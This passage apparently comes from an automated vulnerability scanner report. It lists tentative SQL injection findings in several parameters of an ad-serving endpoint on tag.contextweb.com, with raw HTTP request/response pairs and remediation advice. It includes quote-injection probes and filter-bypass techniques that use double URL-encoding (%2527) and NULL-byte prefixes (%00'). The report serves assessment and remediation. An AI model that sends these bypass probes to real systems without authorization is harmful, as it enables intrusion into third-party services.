Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:49:39 GMT
Content-Length: 2264
Connection: close
Set-Cookie: 539292_4_107784_-1=1316224179419; Domain=.contextweb.com; Path=/
Set-Cookie: vf=1101; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...

1.22. http://tag.contextweb.com/TagPublish/GetAd.aspx [ca parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ca request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD%2527&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2565
Date: Sat, 17 Sep 2011 01:46:43 GMT
Connection: close
Set-Cookie: vf=787; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app204_cfDJ2QoPglRh%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD%2527%2527&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2264
Date: Sat, 17 Sep 2011 01:46:45 GMT
Connection: close
Set-Cookie: 539292_4_107784_-1=1316224004962; Domain=.contextweb.com; Path=/
Set-Cookie: vf=788; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...

1.23. http://tag.contextweb.com/TagPublish/GetAd.aspx [cwu parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The cwu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cwu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cwu request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212%2527&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:54 GMT
Content-Length: 2044
Connection: close
Set-Cookie: vf=489; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_JCVEUma2gDZb%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212%2527%2527&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1816
Date: Sat, 17 Sep 2011 01:17:55 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316222275911; Domain=.contextweb.com; Path=/
Set-Cookie: vf=490; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.24. http://tag.contextweb.com/TagPublish/GetAd.aspx [cxy parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The cxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=%00'&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:45 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=536; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:01 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app202_NcHteBNElrNX%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=%00''&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:45 GMT
Content-Length: 2372
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222325784; Domain=.contextweb.com; Path=/
Set-Cookie: vf=537; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.25. http://tag.contextweb.com/TagPublish/GetAd.aspx [dw parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The dw parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dw parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the dw request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300%2527&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:49 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=484; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app209_0s7g5vuuP87p%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300%2527%2527&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/106
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:50 GMT
Content-Length: 1708
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222270352; Domain=.contextweb.com; Path=/
Set-Cookie: vf=485; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.26. http://tag.contextweb.com/TagPublish/GetAd.aspx [epid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The epid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the epid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=%00'&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
